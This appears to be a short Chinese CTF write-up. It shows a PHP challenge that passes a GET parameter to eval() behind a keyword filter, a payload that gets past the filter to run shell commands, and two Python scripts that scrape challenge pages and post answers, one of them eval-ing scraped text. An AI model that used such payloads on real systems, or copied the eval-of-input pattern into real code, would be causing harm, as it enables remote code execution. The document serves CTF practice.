<?php
//flag in flag.php
highlight_file(__FILE__);
if(isset($_GET['cmd'])){
    $cmd = $_GET['cmd'];
    if(preg_match('/cat|flag/i', $cmd)){
        die('no no no');
    }else{
        eval($cmd);
    }
}
?> 

payload?cmd=system(%27ls|xargs%20less%27);<?php
//flag in flag.php
highlight_file(__FILE__);
if(isset($_GET['cmd'])){
$cmd = $_GET['cmd'];
if(preg_match('/cat|flag/i', $cmd)){
die('no no no');
}else{
eval($cmd);
}
}
?>

<?php
//flag in flag.php
highlight_file(__FILE__);
if(isset($_GET['cmd'])){

$cmd = $_GET['cmd'];
if(preg_match('/cat|flag/i', $cmd)){
    die('no no no');
}else{
    eval($cmd);
}

}
?>


听说你单身了十八年?
那你肯定能把这段文字复制下来发给我吧?

payload

import requests
import re
url=''
r = requests.session()
requestpage = r.get(url)
ans = re.findall(';">(.*?)</div>', requestpage.text)
data={'randomstring':ans[2]}
flag=r.post(url, data=data)
print(flag.text)

听说你能力堪比人形计算机?
那你肯定能把这个式子算出来发给我吧?

payload

import requests
import re
url=''
r = requests.session()
requestpage = r.get(url)
ans1 = re.findall(';">(.*?) =', requestpage.text)[0]
asd = eval(ans1)
data={'math_result':asd}
flag=r.post(url, data=data)
print(flag.text)

最后修改:2022 年 01 月 23 日
如果觉得我的文章对你有用,请随意赞赏